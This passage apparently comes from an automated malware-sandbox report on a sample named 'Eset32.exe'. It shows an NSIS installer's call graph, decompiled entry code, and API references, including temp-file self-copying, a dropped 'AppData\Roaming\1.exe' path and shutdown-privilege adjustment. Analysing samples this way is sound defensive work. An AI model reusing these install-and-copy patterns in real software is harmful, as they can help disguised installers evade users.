API calls 2924->2925 2925->2900 2927 4058bf 60 API calls 2927->2928 2928->2921 2928->2927 2929 40521e 24 API calls 2928->2929 2952 405aba 2928->2952 2956 4060f7 lstrcpynA 2928->2956 2957 405877 2928->2957 2965 40521e 2928->2965 2976 405ed6 MoveFileExA 2928->2976 2929->2921 2986 4060f7 lstrcpynA 2932->2986 2934 405b8e 2987 405b28 CharNextA CharNextA 2934->2987 2937 4058df 2937->2898 2937->2899 2940 405bcf lstrlenA 2941 405bda 2940->2941 2944 405bb7 2940->2944 2943 405a8f 3 API calls 2941->2943 2942 40646b 2 API calls 2942->2944 2945 405bdf GetFileAttributesA 2943->2945 2944->2937 2944->2940 2944->2942 2946 405ad6 2 API calls 2944->2946 2945->2937 2946->2940 2947->2903 2949 405ae3 2948->2949 2950 405af4 2949->2950 2951 405ae8 CharPrevA 2949->2951 2950->2906 2951->2949 2951->2950 2953 405ac0 2952->2953 2954 405ad3 2953->2954 2955 405ac6 CharNextA 2953->2955 2954->2928 2955->2953 2956->2928 3002 405c6b GetFileAttributesA 2957->3002 2960 4058a4 2960->2928 2961 405892 RemoveDirectoryA 2963 4058a0 2961->2963 2962 40589a DeleteFileA 2962->2963 2963->2960 2964 4058b0 SetFileAttributesA 2963->2964 2964->2960 2966 4052dc 2965->2966 2967 405239 2965->2967 2966->2928 2968 405256 lstrlenA 2967->2968 3005 40618a 2967->3005 2970 405264 lstrlenA 2968->2970 2971 40527f 2968->2971 2970->2966 2972 405276 lstrcatA 2970->2972 2973 405292 2971->2973 2974 405285 SetWindowTextA 2971->2974 2972->2971 2973->2966 2975 405298 SendMessageA SendMessageA SendMessageA 2973->2975 2974->2973 2975->2966 2977 405eea 2976->2977 2979 405ef7 2976->2979 3034 405d66 2977->3034 2979->2928 2981 406481 FindClose 2980->2981 2982 405a50 2980->2982 2981->2982 2982->2900 2983 405a8f lstrlenA CharPrevA 2982->2983 2984 405a5a 2983->2984 2985 405aa9 lstrcatA 2983->2985 2984->2915 2985->2984 2986->2934 2988 405b43 2987->2988 2992 405b53 2987->2992 2989 405b4e CharNextA 2988->2989 2988->2992 2990 405b73 2989->2990 2990->2937 2993 4063d2 2990->2993 2991 405aba CharNextA 2991->2992 2992->2990 2992->2991 3000 4063de 2993->3000 2994 406446 2995 40644a CharPrevA 2994->2995 2998 405ba4 2994->2998 2995->2994 2996 40643b CharNextA 2996->2994 2996->3000 2997 405aba CharNextA 2997->3000 2998->2937 2998->2944 2999 406429 CharNextA 2999->3000 3000->2994 3000->2996 3000->2997 3000->2999 3001 406436 CharNextA 3000->3001 3001->2996 3003 405883 3002->3003 3004 405c7d SetFileAttributesA 3002->3004 3003->2960 3003->2961 3003->2962 3004->3003 3006 406197 3005->3006 3007 4063b9 3006->3007 3010 406393 lstrlenA 3006->3010 3012 40618a 10 API calls 3006->3012 3015 4062af GetSystemDirectoryA 3006->3015 3016 4062c2 GetWindowsDirectoryA 3006->3016 3017 4063d2 5 API calls 3006->3017 3018 40618a 10 API calls 3006->3018 3019 40633c lstrcatA 3006->3019 3020 4062f6 SHGetSpecialFolderLocation 3006->3020 3022 405fde 3006->3022 3027 406055 wsprintfA 3006->3027 3028 4060f7 lstrcpynA 3006->3028 3008 4063ce 3007->3008 3029 4060f7 lstrcpynA 3007->3029 3008->2968 3010->3006 3012->3010 3015->3006 3016->3006 3017->3006 3018->3006 3019->3006 3020->3006 3021 40630e SHGetPathFromIDListA CoTaskMemFree 3020->3021 3021->3006 3030 405f7d 3022->3030 3025 406012 RegQueryValueExA RegCloseKey 3026 406041 3025->3026 3026->3006 3027->3006 3028->3006 3029->3008 3031 405f8c 3030->3031 3032 405f90 3031->3032 3033 405f95 RegOpenKeyExA 3031->3033 3032->3025 3032->3026 3033->3032 3035 405db2 GetShortPathNameA 3034->3035 3036 405d8c 3034->3036 3038 405ed1 3035->3038 3039 405dc7 3035->3039 3061 405c90 GetFileAttributesA CreateFileA 3036->3061 3038->2979 3039->3038 3041 405dcf wsprintfA 3039->3041 3040 405d96 CloseHandle GetShortPathNameA 3040->3038 3042 405daa 3040->3042 3043 40618a 17 API calls 3041->3043 3042->3035 3042->3038 3044 405df7 3043->3044 3062 405c90 GetFileAttributesA CreateFileA 3044->3062 3046 405e04 3046->3038 3047 405e13 GetFileSize GlobalAlloc 3046->3047 3048 405e35 3047->3048 3049 405eca CloseHandle 3047->3049 3063 405d08 ReadFile 3048->3063 3049->3038 3054 405e54 lstrcpyA 3057 405e76 3054->3057 3055 405e68 3056 405bf5 4 API calls 3055->3056 3056->3057 3058 405ead SetFilePointer 3057->3058 3070 405d37 WriteFile 3058->3070 3061->3040 3062->3046 3064 405d26 3063->3064 3064->3049 3065 405bf5 lstrlenA 3064->3065 3066 405c36 lstrlenA 3065->3066 3067 405c3e 3066->3067 3068 405c0f lstrcmpiA 3066->3068 3067->3054 3067->3055 3068->3067 3069 405c2d CharNextA 3068->3069 3069->3066 3071 405d55 GlobalFree 3070->3071 3071->3049 4351 4042b1 lstrcpynA lstrlenA 4358 401e35 GetDC 4359 402bac 17 API calls 4358->4359 4360 401e47 GetDeviceCaps MulDiv ReleaseDC 4359->4360 4361 402bac 17 API calls 4360->4361 4362 401e78 4361->4362 4363 40618a 17 API calls 4362->4363 4364 401eb5 CreateFontIndirectA 4363->4364 4365 402620 4364->4365 4366 402a35 SendMessageA 4367 402a5a 4366->4367 4368 402a4f InvalidateRect 4366->4368 4368->4367 4369 4014b7 4370 4014bd 4369->4370 4371 401389 2 API calls 4370->4371 4372 4014c5 4371->4372 4373 402dba 4374 402dc9 SetTimer 4373->4374 4376 402de2 4373->4376 4374->4376 4375 402e37 4376->4375 4377 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4376->4377 4377->4375 3443 4015bb 3444 402bce 17 API calls 3443->3444 3445 4015c2 3444->3445 3446 405b28 4 API calls 3445->3446 3459 4015ca 3446->3459 3447 401624 3449 401652 3447->3449 3450 401629 3447->3450 3448 405aba CharNextA 3448->3459 3452 401423 24 API calls 3449->3452 3463 401423 3450->3463 3455 40164a 3452->3455 3454 405761 2 API calls 3454->3459 3457 40577e 5 API calls 3457->3459 3458 40163b SetCurrentDirectoryA 3458->3455 3459->3447 3459->3448 3459->3454 3459->3457 3460 4015f3 3459->3460 3461 40160c GetFileAttributesA 3459->3461 3460->3459 3462 4056e4 4 API calls 3460->3462 3461->3459 3462->3460 3464 40521e 24 API calls 3463->3464 3465 401431 3464->3465 3466 4060f7 lstrcpynA 3465->3466 3466->3458 4378 4016bb 4379 402bce 17 API calls 4378->4379 4380 4016c1 GetFullPathNameA 4379->4380 4381 4016d8 4380->4381 4387 4016f9 4380->4387 4384 40646b 2 API calls 4381->4384 4381->4387 4382 402a5a 4383 40170d GetShortPathNameA 4383->4382 4385 4016e9 4384->4385 4385->4387 4388 4060f7 lstrcpynA 4385->4388 4387->4382 4387->4383 4388->4387

                                                          Executed Functions

                                                          Function 00403348 Relevance: 89.6, APIs: 33, Strings: 18, Instructions: 366stringcomfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 8 403393 1->8 3 40339f-4033b2 call 406492 lstrlenA 2->3 9 4033b4-4033d0 call 406500 * 3 3->9 8->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 22 4033da 17->22 22->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 40 4035b4-4035ce DeleteFileA call 402ea1 33->40 41 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->41 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 57 403524 37->57 43 4034a5-4034d2 38->43 44 40348f-403495 38->44 59 403662-403672 ExitProcess OleUninitialize 40->59 60 4035d4-4035da 40->60 41->40 58 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 41->58 46 4034d4-4034da 43->46 47 4034e5-403513 43->47 50 403497-403499 44->50 51 40349b 44->51 53 4034e0 46->53 54 4034dc-4034de 46->54 47->37 55 403531-40353d call 4060f7 47->55 50->43 50->51 51->43 53->47 54->47 54->53 55->33 57->28 58->40 58->59 65 403796-40379c 59->65 66 403678-403688 call 405813 ExitProcess 59->66 63 403652-403659 call 40390a 60->63 64 4035dc-4035e7 call 405aba 60->64 75 40365e 63->75 81 4035e9-403612 64->81 82 40361d-403627 64->82 67 403818-403820 65->67 68 40379e-4037b7 GetCurrentProcess OpenProcessToken 65->68 77 403822 67->77 78 403826-40382a ExitProcess 67->78 73 4037e9-4037f7 call 406500 68->73 74 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 68->74 89 403805-40380f ExitWindowsEx 73->89 90 4037f9-403803 73->90 74->73 75->59 77->78 86 403614-403616 81->86 83 403629-403636 call 405b7d 82->83 84 40368e-4036a2 call 40577e lstrcatA 82->84 83->59 97 403638-40364e call 4060f7 * 2 83->97 95 4036a4-4036aa lstrcatA 84->95 96 4036af-4036c9 lstrcatA lstrcmpiA 84->96 86->82 91 403618-40361b 86->91 89->67 94 403811-403813 call 40140b 89->94 90->89 90->94 91->82 91->86 94->67 95->96 96->59 100 4036cb-4036ce 96->100 97->63 102 4036d0-4036d5 call 4056e4 100->102 103 4036d7 call 405761 100->103 110 4036dc-4036e9 SetCurrentDirectoryA 102->110 103->110 111 4036f6-40371e call 4060f7 110->111 112 4036eb-4036f1 call 4060f7 110->112 116 403724-403740 call 40618a DeleteFileA 111->116 112->111 119 403781-403788 116->119 120 403742-403752 CopyFileA 116->120 119->116 122 40378a-403791 call 405ed6 119->122 120->119 121 403754-403774 call 405ed6 call 40618a call 405796 120->121 121->119 131 403776-40377d CloseHandle 121->131 122->59 131->119
                                                          C-Code - Quality: 85%
                                                          			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				intOrPtr _t188;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t118 = E00406500(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E00406492(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E00406500(0xb);
				 *0x42f424 = E00406500(9);
				_t47 = E00406500(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429850, 0, _t163 + 0x38, 0x160, 0); // executed
				E004060F7("Name Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t159 = "\"C:\\Users\\alfons\\Desktop\\Eset32.exe\" ";
				E004060F7(_t159, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t159;
				if("\"C:\\Users\\alfons\\Desktop\\Eset32.exe\" " == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405ABA(_t53,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t55;
				while(1) {
					_t121 =  *_t55;
					_t171 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405ABA(_t55,  *(_t163 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060F7(0x435400,  &(_t55[2]));
										L30:
										_t156 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156);
										_t59 = E00403317(_t171);
										_t172 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t174,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t184 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t62 =  *0x42f4ec;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E00406500(4);
													__eflags = _t66;
													if(_t66 == 0) {
														L65:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405813( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t163 + 0x18) = E0040390A( *0x42f4ec);
												goto L43;
											}
											_t152 = E00405ABA(_t159, 0);
											if(_t152 < _t159) {
												L39:
												_t181 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E0040577E(_t184);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\alfons\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\alfons\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E00405761();
														} else {
															E004056E4();
														}
														SetCurrentDirectoryA(_t156);
														_t188 =  *0x435400; // 0x0
														if(_t188 == 0) {
															E004060F7(0x435400, _t161);
														}
														E004060F7(0x430000,  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														 *0x430400 = "A";
														do {
															E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429450);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\Eset32.exe", 0x429450, 1) != 0) {
																E00405ED6(_t136, 0x429450, 0);
																E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t93 = E00405796(0x429450);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00405ED6(_t136, _t156, 0);
													}
													goto L43;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E00405B7D(_t181, _t152 + 4) == 0) {
													goto L43;
												}
												E004060F7(0x435400, _t153);
												E004060F7("C:\\Users\\alfons\\AppData\\Roaming", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L42;
											}
											_t109 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E00403317(_t172);
										_t173 = _t112;
										if(_t112 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E00403317(_t173);
										_t174 = _t117;
										if(_t117 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t140 = _t55[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L23:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t141 = _t55[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                          0x00403358
                                                          0x0040335c
                                                          0x00403364
                                                          0x00403368
                                                          0x0040336d
                                                          0x00403379
                                                          0x00403382
                                                          0x00403387
                                                          0x0040338a
                                                          0x00403391
                                                          0x00403398
                                                          0x00403398
                                                          0x00403391
                                                          0x0040339a
                                                          0x0040339f
                                                          0x004033a0
                                                          0x004033ac
                                                          0x004033b0
                                                          0x004033b6
                                                          0x004033c4
                                                          0x004033c9
                                                          0x004033d0
                                                          0x004033d4
                                                          0x004033d8
                                                          0x004033da
                                                          0x004033da
                                                          0x004033d8
                                                          0x004033e2
                                                          0x004033e9
                                                          0x004033ef
                                                          0x00403405
                                                          0x00403415
                                                          0x0040341a
                                                          0x00403420
                                                          0x00403427
                                                          0x00403433
                                                          0x0040343d
                                                          0x0040343f
                                                          0x00403441
                                                          0x00403446
                                                          0x00403446
                                                          0x00403456
                                                          0x0040345c
                                                          0x00403525
                                                          0x00403525
                                                          0x00403527
                                                          0x00403529
                                                          0x00000000
                                                          0x00000000
                                                          0x00403465
                                                          0x00403468
                                                          0x00403470
                                                          0x00403470
                                                          0x00403473
                                                          0x00403478
                                                          0x0040347a
                                                          0x0040347a
                                                          0x0040347b
                                                          0x0040347b
                                                          0x00403480
                                                          0x00403483
                                                          0x00403515
                                                          0x0040351a
                                                          0x0040351f
                                                          0x00403522
                                                          0x00403524
                                                          0x00403524
                                                          0x00403524
                                                          0x00000000
                                                          0x00403489
                                                          0x00403489
                                                          0x0040348a
                                                          0x0040348d
                                                          0x004034a5
                                                          0x004034d0
                                                          0x004034d2
                                                          0x004034e5
                                                          0x00403510
                                                          0x00403513
                                                          0x00403531
                                                          0x00403534
                                                          0x0040353d
                                                          0x00403542
                                                          0x00403548
                                                          0x00403553
                                                          0x00403555
                                                          0x0040355a
                                                          0x0040355c
                                                          0x004035b4
                                                          0x004035b9
                                                          0x004035c3
                                                          0x004035ca
                                                          0x004035ce
                                                          0x00403662
                                                          0x00403662
                                                          0x00403667
                                                          0x0040366d
                                                          0x00403672
                                                          0x00403796
                                                          0x0040379c
                                                          0x00403818
                                                          0x00403818
                                                          0x0040381d
                                                          0x00403820
                                                          0x00403822
                                                          0x00403822
                                                          0x0040382a
                                                          0x0040382a
                                                          0x004037ac
                                                          0x004037b4
                                                          0x004037b6
                                                          0x004037b7
                                                          0x004037c4
                                                          0x004037d7
                                                          0x004037df
                                                          0x004037e3
                                                          0x004037e3
                                                          0x004037eb
                                                          0x004037f0
                                                          0x004037f7
                                                          0x00403805
                                                          0x00403807
                                                          0x0040380d
                                                          0x0040380f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004037f9
                                                          0x004037ff
                                                          0x00403801
                                                          0x00403803
                                                          0x00403811
                                                          0x00403813
                                                          0x00000000
                                                          0x00403813
                                                          0x00000000
                                                          0x00403803
                                                          0x004037f7
                                                          0x00403681
                                                          0x00403688
                                                          0x00403688
                                                          0x004035da
                                                          0x00403652
                                                          0x00403652
                                                          0x0040365e
                                                          0x00000000
                                                          0x0040365e
                                                          0x004035e3
                                                          0x004035e7
                                                          0x0040361d
                                                          0x0040361d
                                                          0x0040361f
                                                          0x00403627
                                                          0x00403699
                                                          0x0040369b
                                                          0x004036a2
                                                          0x004036aa
                                                          0x004036aa
                                                          0x004036b5
                                                          0x004036ba
                                                          0x004036c9
                                                          0x004036cd
                                                          0x004036ce
                                                          0x004036d7
                                                          0x004036d0
                                                          0x004036d0
                                                          0x004036d0
                                                          0x004036dd
                                                          0x004036e3
                                                          0x004036e9
                                                          0x004036f1
                                                          0x004036f1
                                                          0x004036ff
                                                          0x00403704
                                                          0x00403716
                                                          0x0040371e
                                                          0x00403724
                                                          0x00403730
                                                          0x00403736
                                                          0x00403740
                                                          0x00403756
                                                          0x00403767
                                                          0x0040376d
                                                          0x00403774
                                                          0x00403777
                                                          0x0040377d
                                                          0x0040377d
                                                          0x00403774
                                                          0x00403781
                                                          0x00403787
                                                          0x00403787
                                                          0x0040378c
                                                          0x0040378c
                                                          0x00000000
                                                          0x004036c9
                                                          0x00403629
                                                          0x0040362b
                                                          0x00403636
                                                          0x00000000
                                                          0x00000000
                                                          0x0040363e
                                                          0x00403649
                                                          0x0040364e
                                                          0x00000000
                                                          0x0040364e
                                                          0x00403612
                                                          0x00403614
                                                          0x00403618
                                                          0x0040361b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040361b
                                                          0x00000000
                                                          0x00403614
                                                          0x00403564
                                                          0x00403570
                                                          0x00403575
                                                          0x0040357a
                                                          0x0040357c
                                                          0x00000000
                                                          0x00000000
                                                          0x00403584
                                                          0x0040358c
                                                          0x0040359d
                                                          0x004035a5
                                                          0x004035a7
                                                          0x004035ac
                                                          0x004035ae
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004035ae
                                                          0x00000000
                                                          0x00403513
                                                          0x004034d4
                                                          0x004034d7
                                                          0x004034da
                                                          0x004034e0
                                                          0x004034e0
                                                          0x004034e0
                                                          0x004034e0
                                                          0x00000000
                                                          0x004034e0
                                                          0x004034dc
                                                          0x004034de
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004034de
                                                          0x0040348f
                                                          0x00403492
                                                          0x00403495
                                                          0x0040349b
                                                          0x0040349b
                                                          0x00000000
                                                          0x0040349b
                                                          0x00403497
                                                          0x00403499
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403499
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040346a
                                                          0x0040346a
                                                          0x0040346a
                                                          0x0040346b
                                                          0x0040346b
                                                          0x00000000
                                                          0x0040346a
                                                          0x00000000

                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 0040336D
                                                          • GetVersion.KERNEL32 ref: 00403373
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                          • OleInitialize.OLE32(00000000), ref: 004033E9
                                                          • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                          • GetCommandLineA.KERNEL32(Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Eset32.exe" ,00000020,"C:\Users\user\Desktop\Eset32.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,76DDFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Eset32.exe" ,00000000), ref: 00403924
                                                            • Part of subcall function 0040390A: lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,?,?,?,C:\Users\user\AppData\Roaming\1.exe,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76DDFA90), ref: 004039FA
                                                            • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\1.exe,?,?,?,C:\Users\user\AppData\Roaming\1.exe,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                            • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe), ref: 00403A18
                                                            • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                            • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                          • ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 00403662
                                                            • Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                          • ExitProcess.KERNEL32 ref: 00403688
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                          • ExitProcess.KERNEL32 ref: 0040382A
                                                            • Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
